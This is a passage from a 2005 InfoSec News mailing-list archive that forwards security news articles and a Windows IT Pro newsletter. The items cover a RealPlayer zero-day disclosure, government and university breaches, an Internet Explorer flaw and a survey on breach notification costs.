criticized third-party hackers who release flaw warnings and zero-day proof-of-concept exploits, insisting that the practice puts users at risk of attack. In this case, "c0ntex" said he was working privately with RealNetworks on a patch but decided to release the exploit to prevent someone from stealing his work. "[I]t seems someone is trying to pinch my research, as such I have been forced to release this advisory sooner than hoped. Until [RealNetworks can] get a new release out, do not play untrusted media with RealPlayer or Helix Player," the researcher said. He even added an apology to the Seattle-based digital media delivery company. This is not the only unpatched flaw in the RealPlayer software. eEye Digital Security's list of upcoming advisories includes two high-risk vulnerabilities in the widely deployed media player. According to eEye, RealNetworks has been working on a fix since early July. Both flaws could open the door for malicious code execution attacks. From isn at c4i.org Wed Sep 28 00:47:04 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:56:37 2005 Subject: [ISN] RP only ASEAN nation with hacked military Web domain Message-ID: Forwarded from: security curmudgeon : http://www.mb.com.ph/INFO2005092345065.html : : By melvin G. calimag : Sept 23, 2005 : : To illustrate how hacking and cracking have become widespread in the : Internet, a security firm said the Philippines is the only country in : the Southeast Asian (SEA) region, and possibly in the whole world, whose : military domain address (mil.ph) has been hacked several times in the : last six years. : From 1999 to 2005, a total of nine attacks were recorded under the : country's military domain name, said 3Com senior manager for security : Ken Low in a recent press briefing. Does anyone at Tipping Point want to cite their sources for all this information? Last I checked, they weren't in the business of monitoring web site defacements to this degree, especially dating back to 1999.. From isn at c4i.org Wed Sep 28 00:47:34 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:58:00 2005 Subject: [ISN] IG: Better security needed for key Coast Guard database Message-ID: Forwarded from: William Knowles http://www.washingtontechnology.com/news/1_1/daily_news/27078-1.html By Alice Lipowicz Staff Writer 09/27/05 The Coast Guard does not have adequate database security controls for its Marine Information for Safety and Law Enforcement (MISLE) system, which contains sensitive but unclassified information for Coast Guard missions, according to a new report [1] from Homeland Security Department Inspector General Richard Skinner. MISLE is a Web-based database system used to track marine safety and law-enforcement activities involving commercial and recreational vessels. It contains information on Coast Guard waterway details, vessel and facility inspection information and incident investigation. The Vessel Documentation System, which tracks vessel ownership, also is accessible to personnel using the MISLE. Although the Coast Guard has implemented many controls for the system, it has not established effective procedures for monitoring user access, nor has it developed an adequate IT contingency plan, the report said. Furthermore, there are vulnerabilities on Coast Guard database servers related to access rights, password administration, configuration management and encryption. "Due to these database security exposures, there is an increased risk that unauthorized individuals could gain access to critical Coast Guard database resources and compromise the confidentiality, integrity and availability of sensitive MISLE data," the report stated. "In addition, the Coast Guard may not be able to recover MISLE following a disaster." The inspector general recommended the Coast Guard implement adequate controls and develop an IT contingency plan for the system, and apply corrective actions to all other databases as well. Coast Guard officials, in their response, agreed with most of the findings and recommendations. [1] http://www.dhs.gov/interweb/assetlibrary/OIGr_05-31_Aug05.pdf *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ================================================================ C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Thu Sep 29 00:27:45 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:35:36 2005 Subject: [ISN] Purdy: DHS will ramp up cybersecurity Message-ID: http://www.washingtontechnology.com/news/1_1/daily_news/27084-1.html By Alice Lipowicz Staff Writer 09/28/05 The Homeland Security Department has drafted a set of key scenarios for possible cyberattacks against the Internet and critical IT systems, and is seeking comments from the private sector on how to best prepare and respond to such attacks, according to Andy Purdy, acting director of DHS' National Cybersecurity Division. DHS officials and the White House also are putting the finishing touches on a new national cybersecurity research and development plan, Purdy said earlier this week at a seminar on Capitol Hill. The event was sponsored by Nortel Networks Corp., a global telecommunications equipment manufacturer based in Brampton, Ontario. "At DHS we recognize the importance of cybersecurity risks and we are energized by that risk," Purdy said. Homeland Security Secretary Michael Chertoff also is preparing to name an assistant secretary for cybersecurity and telecommunications, he said. Purdy outlined several initiatives undertaken by his division to bolster cybersecurity and to prepare for a national cyberattack exercise known as Cyber Storm in November. As part of their planning for disaster recovery for IT systems, DHS officials are looking at key dependency elements, such as maintaining adequate electrical power supplies, as critical parts of the recovery, Purdy said. The department is working with advisers to prepare plans for maintaining Internet operation following a catastrophe, and also focusing on Internet-based control and process systems, which are IT systems that control the daily operations and interrelations of many plants and utilities. "Control and process systems are one of our major priority efforts - it's a huge challenge and a significant cybersecurity risk," Purdy added. DHS also is meeting with software industry groups to promote shared responsibility for cybersecurity. "It's not just the responsibility of end users. The hardware and software makers need to do a better job to reduce vulnerabilities so we can all be safer," he said. For example, the industry needs to develop tools to make sure that software does not include secret back doors and malicious code, he said. Also at the event, Nortel CEO Bill Owens warned that a catastrophic cyberattack against the Internet could create a "virtual [Hurricane] Katrina" that would reverberate throughout the U.S. economy. Owens said the growing threat over the next two or three years is coming from new viruses that may attack wireless devices and mobile phones, which can then infect broadband networks, government computers and mission-critical IT systems. He said China, India and South Korea take the risks more seriously than does the United States. "I am frightened as hell about this issue of cybersecurity because we see it in spades around the world," Owens said. From isn at c4i.org Thu Sep 29 00:23:03 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:36:04 2005 Subject: [ISN] Computer breach reported at UGA Message-ID: http://www.ajc.com/metro/content/metro/0905/29ugabreach.html By KELLY SIMMONS The Atlanta Journal-Constitution Published on: 09/29/05 ATHENS - A hacker broke into a computer database at the University of Georgia, gaining access to the Social Security numbers of employees in the College of Agricultural and Environmental Sciences and people who are paid from that department. More than 2,400 numbers, belonging to roughly 1,600 people, may have been exposed, UGA spokesman Tom Jackson said Wednesday. The names and numbers were not connected on the documents, Jackson said, but an experienced hacker could be able to interpret the data well enough to match them. No credit card information was on the database. The break-in apparently came from "an automated source outside the country," UGA officials said. The university is attempting to contact individuals whose names were in the database to warn them of potential identity theft. UGA officials discovered the break-in last week. The Georgia Bureau of Investigation and the FBI are looking into the security breach. This is the second time in two years that computer hackers have broken into a database at UGA. In January 2004, intruders gained access to a server that contained the names, Social Security numbers, birth dates and credit card information of students who had applied to UGA since 2002. No one has been arrested in connection with that incident, Jackson said. In May of this year, Georgia Southern and Valdosta State universities each reported that hackers had gained access to personal information on their computer databases. From isn at c4i.org Thu Sep 29 00:27:16 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:36:34 2005 Subject: [ISN] Security UPDATE -- Reading EULAs Can Help Prevent Spyware Infiltration -- September 28, 2005 Message-ID: ==================== This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE. Symantec LiveState Patch Manager http://list.windowsitpro.com/t?ctl=14B65:4FB69 Filtering the Spectrum of Internet Threats: Defending Against Inappropriate Content, Spyware, IM, and P2P at the Perimeter http://list.windowsitpro.com/t?ctl=14B4E:4FB69 ==================== 1. In Focus: Reading EULAs Can Help Prevent Spyware Infiltration 2. Security News and Features - Recent Security Vulnerabilities - Microsoft Boosts Its Ability to Provide End-to-End PKI Solutions - New Microsoft Tool Locks Down Shared XP Systems 3. Security Toolkit - Security Matters Blog - FAQ - Security Forum Featured Thread 4. New and Improved - Control Endpoint Media Devices ==================== ==== Sponsor: Symantec ==== Symantec LiveState Patch Manager Symantec LiveState Patch Manager allows you to reliably protect your infrastructure from vulnerabilities. Its intuitive interface allows organizations to scan, identify and install missing patches on hundreds of clients and servers in minutes. Flexible grouping capabilities allow the targeting of patches to specific groups of users. Provides detailed patch status reports. Persistent delivery assures patches are successfully delivered and applied, helping ensure clients are secure and protected. LiveState Patch Manager is a member of a family of modular solutions that work on their own--with tools you may already have--and can be assembled into a broader suite if desired, leveraging a common look-and-feel, management database and agent deployment infrastructure. To learn more, visit us at: http://list.windowsitpro.com/t?ctl=14B65:4FB69 ==================== ==== 1. In Focus: Reading EULAs Can Help Prevent Spyware Infiltration by Mark Joseph Edwards, News Editor, mark at ntsecurity / net Does anybody (except lawyers) really like reading End User License Agreements (EULAs)? For that matter, does anybody like reading privacy statements? I doubt it. But it's something we all should do because if we don't, we can eventually wind up with all kinds of spyware on our networks that could lead to serious problems. For example, you might download a slick-looking desktop tool, click to accept the EULA without reading it, then later find out that the tool has been recording all your Web and email activity and sending that information to someone's data collection center. In another scenario, you might install the latest IM and chat tool. If you don't read the privacy policy, you might not know that the company providing the tool reserves the right to track who you contact, how often you transfer data, and more. That's just the tip of iceberg. In fact, poorly written EULAs and privacy statements, along with people's unwillingness to read them carefully, have spawned an entire multimillion- (if not billion-) dollar industry that now focuses exclusively on the elimination of spyware. When surfing the Web last week, I came across an interesting story at Techdirt that points out just how lackadaisical people can be when it comes to reading EULAs. Techdirt pointed out an experiment conducted by PC Pitstop (at the URL below). The company embedded in one of its EULAs an offer of $1000 to the first person who simply asked for it! More than 3000 people downloaded the software before somebody actually asked for the check! http://list.windowsitpro.com/t?ctl=14B63:4FB69 A few weeks ago, I learned about a new tool, EULAlyzer from Javacool Software (at the URL below), which as the name implies is designed to help you analyze EULAs to look for areas that might need extra attention. It works by scanning for keywords. It then links to areas that contain those keywords so that you can review those spots. I tested EULAlyzer on a EULA and found that it did point me to some key phrases that I needed to read more closely, but it certainly didn't eliminate the need for me to read the entire EULA carefully. http://list.windowsitpro.com/t?ctl=14B61:4FB69 Last week, I learned about another tool, currently called Project Truth Serum (read about it at the first URL below), that will help analyze EULAs. That tool is being developed by Facetime Communications (at the second URL below) and is currently in closed beta testing, so I didn't have a chance to try it. But based on the sample output, which you can view at the third URL below, the tool provides similar functionality to EULAlyzer. http://list.windowsitpro.com/t?ctl=14B5B:4FB69 http://list.windowsitpro.com/t?ctl=14B67:4FB69 http://list.windowsitpro.com/t?ctl=14B54:4FB69 I don't see any reason why EULA analyzers couldn't be made to analyze privacy statements. But when I tried EULAlyzer on a tool's privacy statement, it didn't flag anything as suspect, even though the statement did indicate that my use of the tool would be tracked. But maybe at some point, Javacool and/or Facetime will upgrade their analyzers to also work on privacy statements. At any rate, both of these tools are essentially designed to help guard against spyware. Although they're useful to some extent, they certainly aren't replacements for careful reading, nor are they designed to offer you legal advice. They are simply helper applications that might prevent you from overlooking something in a given EULA. If you're interested in this sort of helper application, try EULAlyzer and keep an eye out for Facetime's eventual product release. ==================== ==== Sponsor: St. Bernard Software ==== Filtering the Spectrum of Internet Threats: Defending Against Inappropriate Content, Spyware, IM, and P2P at the Perimeter Because of the proliferation of Web-based threats, you can no longer rely on basic firewalls as your sole network protection. Attackers continue to evolve clever methods for reaching victims, such as sending crafty Web links through Instant Messaging (IM) clients or email, or by simply linking to other Web sites that your employees might surf. This free white paper examines the threats of allowing unwanted or offensive content into your network and describes the technologies and methodologies to combat these types of threats. Get your free copy now! http://list.windowsitpro.com/t?ctl=14B4E:4FB69 ==================== ==== 2. Security News and Features ==== Recent Security Vulnerabilities If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at http://list.windowsitpro.com/t?ctl=14B56:4FB69 Microsoft Boosts Its Ability to Provide End-to-End PKI Solutions Microsoft announced that it has acquired privately held Alacris, maker of identity and access-management solutions. The acquisition puts Microsoft in a better position to offer end-to-end solutions and to take the solutions beyond the enterprise environment and out to consumers. http://list.windowsitpro.com/t?ctl=14B5C:4FB69 New Microsoft Tool Locks Down Shared XP Systems Microsoft released a new toolkit that helps you lock down shared Windows XP systems. The new Shared Computer Toolkit for Windows XP includes three parts, including a disk protection tool, user restrictions tool, and an accessibility tool. http://list.windowsitpro.com/t?ctl=14B5F:4FB69 ==================== ==== Resources and Events ==== Exploit the Opportunities of a Wireless Fleet With the endless array of mobile and wireless devices and applications, it's hard to decide what you can do with the devices beyond providing mobile email access. It's even tougher to know how to keep it all secure. Join industry guru Randy Franklin Smith in this free Web seminar and discover what you can do to leverage your mobile and wireless infrastructure, how to pick devices that are right for you, and more! http://list.windowsitpro.com/t?ctl=14B50:4FB69 Get Ready for the SQL Server 2005 Roadshow in Europe Back By Popular Demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and a one-year subscription to SQL Server Magazine. Register now. http://list.windowsitpro.com/t?ctl=14B52:4FB69 Are You Walking the Tightrope Between Recovery and Continuity? There's a big difference between the ability to quickly recover lost or damaged data and the ability to keep your messaging operations running normally before, during, and after an outage. In this free Web seminar, you'll learn what the technical differences are between recovery and continuity, when each is important, and what you can do to make sure that you're hitting the right balance between them. http://list.windowsitpro.com/t?ctl=14B51:4FB69 Streamline Desktop Deployments--Free Web Seminar and White Paper! Managing desktop software configurations doesn't have to be a manual process, resulting in unplanned costs, deployment delays, and client confusion. In this on-demand Web seminar, find out how to manage the software package preparation process and increase your desktop reliability, user satisfaction, and IT cost effectiveness. Plus-- register today and receive a free industry white paper on standardizing the software packaging process. http://list.windowsitpro.com/t?ctl=14B4F:4FB69 Deploy VoIP and FoIP Technologies Voice over IP (VoIP) is the future of telecommunications and many companies are already enjoying the benefits of transporting voice over IP networks to significantly reduce telephone and facsimile costs. Join industry expert David Chernicoff for this free Web seminar to learn the ins and outs of boardless fax in IP environments, tips for rolling out fax, integrating fax with telephony technologies, and more! http://list.windowsitpro.com/t?ctl=14B55:4FB69 ==================== ==== Featured White Paper ==== Supercharging SMS for Effective Asset Management Cost control and license compliance have risen to the top of the IT asset and desktop management agenda. Learn to map Microsoft's SMS to specific business objectives and examine the pitfalls of relying solely on SMS to achieve business IT asset management objectives. Download this free white paper now and find out how you can leverage technology to bridge the gap between technical professionals and your CFO. http://list.windowsitpro.com/t?ctl=14B4C:4FB69 ==================== ==== 3. Security Toolkit ==== Security Matters Blog: Are Most Desktop Firewalls too Complicated? by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=14B62:4FB69 An interesting assertion is that Windows Firewall is enough for most people because they aren't capable of making informed decisions about whether to allow certain outbound network traffic. If that's true, is it just that such people need a more intuitive interface and possibly a little education? Read the rest of this blog entry for more about this subject and post your comments to share your opinion with other readers. http://list.windowsitpro.com/t?ctl=14B5E:4FB69 FAQ by John Savill, http://list.windowsitpro.com/t?ctl=14B60:4FB69 Q: How do I log on to Windows Vista using a domain account? Find the answer at http://list.windowsitpro.com/t?ctl=14B5D:4FB69 Security Forum Featured Thread: Problem with Windows Update A forum participant writes that when he tries to access Windows Update he receives the message "The website has encountered a problem and cannot display the page you are trying to view." This occurs just after the site informs him that it's checking for the latest updates. He said this happens only on one server and wonders if anyone knows what the problem might be. Join the discussion at http://list.windowsitpro.com/t?ctl=14B4D:4FB69 ==================== ==== Announcements ==== (from Windows IT Pro and its partners) Stay Up-to-Date with the Windows IT Security Newsletter Every issue of Windows IT Security features related product coverage of the best security tools available and expert advice on the best way to implement security. Our expanded content includes even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get access to our entire online security article database (more than 1900 articles)! Subscribe today: http://list.windowsitpro.com/t?ctl=14B58:4FB69 VIP Monthly Online Pass = Quick Security Answers! Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire Windows IT Security online article database, including exclusive subscriber-only content. That's a database of more than 1900 security articles to help you get all the answers you need, when you need them. Sign up now: http://list.windowsitpro.com/t?ctl=14B59:4FB69 ==================== ==== 4. New and Improved ==== by Renee Munshi, products@windowsitpro.com Control Endpoint Media Devices Ecora Software announced the latest version of its endpoint security solution, Ecora DeviceLock. DeviceLock provides centralized management and access control for USB and FireWire ports, Wi-Fi and Bluetooth adapters, CD-ROM/DVD and floppy drives, and other removable media devices according to user, schedule, and/or specific device. DeviceLock now lets you define a discrete list of administrator accounts so that users with local administrator privileges can't disable or remove DeviceLock services from computers. The product's USB whitelist can now limit access to devices whose serial numbers are on the list. And DeviceLock can now display custom messages when an access attempt is denied. DeviceLock pricing starts at $35 per endpoint. For more information, visit http://list.windowsitpro.com/t?ctl=14B68:4FB69 Tell Us About a Hot Product and Get a T-Shirt! Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com. Editor's note: Share Your Security Discoveries and Get $100 Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length. ==================== ==== Sponsored Links ==== Argent Versus MOM 2005 Download Argent Versus Microsoft Operations Manager 2005 http://list.windowsitpro.com/t?ctl=14B4B:4FB69 Is Your Office Truly Fax Integrated? Download this free whitepaper from Faxback and find out! http://list.windowsitpro.com/t?ctl=14B53:4FB69 Admins rush to install BLOG servers How to run your own blog server. Free 5 user license. http://list.windowsitpro.com/t?ctl=14B66:4FB69 ==================== ==== Contact Us ==== About the newsletter -- letters@windowsitpro.com About technical questions -- http://list.windowsitpro.com/t?ctl=14B64:4FB69 About product news -- products@windowsitpro.com About your subscription -- windowsitproupdate@windowsitpro.com About sponsoring Security UPDATE -- salesopps@windowsitpro.com ==================== This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today. http://list.windowsitpro.com/t?ctl=14B5A:4FB69 View the Windows IT Pro privacy policy at http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy Windows IT Pro, a division of Penton Media, Inc. 221 East 29th Street, Loveland, CO 80538 Attention: Customer Service Department Copyright 2005, Penton Media, Inc. All rights reserved. From isn at c4i.org Thu Sep 29 00:27:33 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:37:35 2005 Subject: [ISN] Microsoft probes report of IE flaw Message-ID: http://beta.news.com.com/Microsoft+probes+report+of+IE+flaw/2100-1002_3-5841381.html By Joris Evers Staff Writer, CNET News.com September 28, 2005 A new flaw in Internet Explorer could be exploited to launch spoof-based attacks, or access and change data on vulnerable PCs, security experts have warned. The problem lies in the way Microsoft has implemented a JavaScript component in its Web browser, security researcher Amit Klein wrote in a research document. Internet Explorer does not validate some data fields provided by a PC when the component, called XmlHttpRequest, is used, he wrote. The vulnerability could be exploited with specially crafted code. An attacker could spoof a legitimate Web site, access data from the Web browser's cache or stage a so-called man-in-the-middle attack, which taps into traffic between a user and another Web site, according to Klein's write-up. Fully-patched computers running Windows XP with Service Pack 2 and Internet Explorer 6.0 are vulnerable to this issue, security monitoring company Secunia said in an advisory. Secunia rates the problem as "moderately critical" but says people can avoid the risk by setting the security level in IE to "high." Microsoft is investigating the vulnerability report, a company representative said in a statement. The software maker is not aware of any attacks that take advantage of the flaw, the representative said. Upon completion of the investigation, Microsoft may provide a security update or emergency fix. Previous Next Microsoft is unhappy about the way the problem was disclosed. The company urges security researchers to report problems in its products privately so it can provide a fix. "This public disclosure potentially puts computer users at risk," the Microsoft representative said. Over the last weeks, several security researchers have come forward with flaws in Internet Explorer, which is part of Windows. Some of these vulnerabilities could let an intruder gain control of a user's PC. Microsoft initially planned to release at least one patch for Windows earlier this month but pulled it because of quality issues. Secunia has published 86 security advisories on IE, of which 20 are currently marked "unpatched" in the Secunia database. From isn at c4i.org Thu Sep 29 00:28:07 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:37:59 2005 Subject: [ISN] Survey: Security breaches could prove costly to data companies Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,105015,00.html By Jaikumar Vijayan SEPTEMBER 28, 2005 COMPUTERWORLD Security breaches that compromise confidential customer data could prove far costlier for the companies involved than generally thought. In a national survey of more than 1,000 victims of personal data security breaches, nearly 20% said they had already terminated their relationships with companies that maintained their data, while another 40% said they might do so. And nearly 5% of those surveyed said they had hired lawyers to seek legal recourse after their data was put at risk. The numbers highlight growing consumer angst over personal data compromises, said David Bender co-chair of the privacy practice at White & Case LLC, a New York-based law firm that sponsored the survey. The survey was independently conducted by the Ponemon Institute LLC, a privacy think tank in Tucson, Ariz. Ponemon's National Survey on Data Security Breach Notifications was completed in August and the results were released on Monday. The survey was conducted to find out how individuals reacted to data security breach notifications. More than 51,000 people were invited to participate in the survey via e-mail, and the results are based on the responses of 1,109 people who said they had been informed of breaches involving a compromise of their personal information. "It was not surprising that consumers had already terminated or would want to terminate their relationships" after a data breach, Bender said. "What was surprising was the actual percentages. No one expects the consequences will be good [after a data compromise], but few realized just how serious the ramifications can be." The timeliness, manner and effectiveness with which companies communicate the details of a security breach have a direct impact on the fallout, said Larry Ponemon, founder of the Ponemon Institute. Companies that are straightforward in communicating what they know about a breach, as soon as they have the relevant details, are likely to see far less "consumer churn" than companies that are evasive, he said. How customers are notified of breaches also appears to be crucial, he said. Standard form letters and e-mails, for instance, are viewed far more skeptically than personalized letters and phone calls, he said. In many cases, data breach notifications that are sent are simply overlooked or discarded as junk mail or spam. "If a company has a breach and it wants to mitigate the potential costs and loss of customer trust they should start considering it as an important communication opportunity to prove to the customer that it cares about them," Ponemon said. The fact that nearly 12% of survey respondents said their confidence in a company had actually increased after they were notified of a security breach points to the value of effective communication, he said. Often the damage from data security breaches goes beyond just scaring customers away. Nearly 58% of respondents to the survey said a breach had decreased their sense of trust and confidence in the organization reporting the incident. Even though consumers may not always immediately end their relationship with a company, a breach can "lessen the relationship" between the two, Ponemon said. Affected consumers for instance, are likely to be less receptive to new offers and services and are more likely to switch companies when they can. The ability to attract new customers can also be seriously hurt by a data security breach, he said. As a result, Ponemon said, it is better to incur "large upfront costs" if necessary to properly communicate the scope of a breach.